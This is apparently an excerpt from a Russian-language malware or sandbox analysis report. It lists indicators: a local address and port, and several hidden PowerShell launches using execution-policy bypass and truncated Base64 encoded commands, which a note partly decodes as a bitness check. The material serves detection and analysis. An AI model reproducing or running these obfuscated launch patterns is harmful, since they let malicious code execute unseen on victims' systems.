Техническая информация
- '<LOCALNET>.43.35':9744
- '<SYSTEM32>\cmd.exe' /c powershell.exe -executionpolicy bypass -noprofile -win hidden -EncodedCommand aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgA...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powershell.exe -executionpolicy bypass -noprofile -win hidden -EncodedCommand aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgA...
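- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -executionpolicy bypass -noprofile -win hidden -EncodedCommand aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQ... (аргумент -EncodedCommand — это Base64 от текста в UTF-16LE; видимая часть декодируется в «if([IntPtr]::Size -eq 4){$b='powershell.exe'}else», то есть команда начинается с проверки разрядности процесса; продолжение на странице обрезано, поэтому полное содержимое команды по этой записи восстановить нельзя)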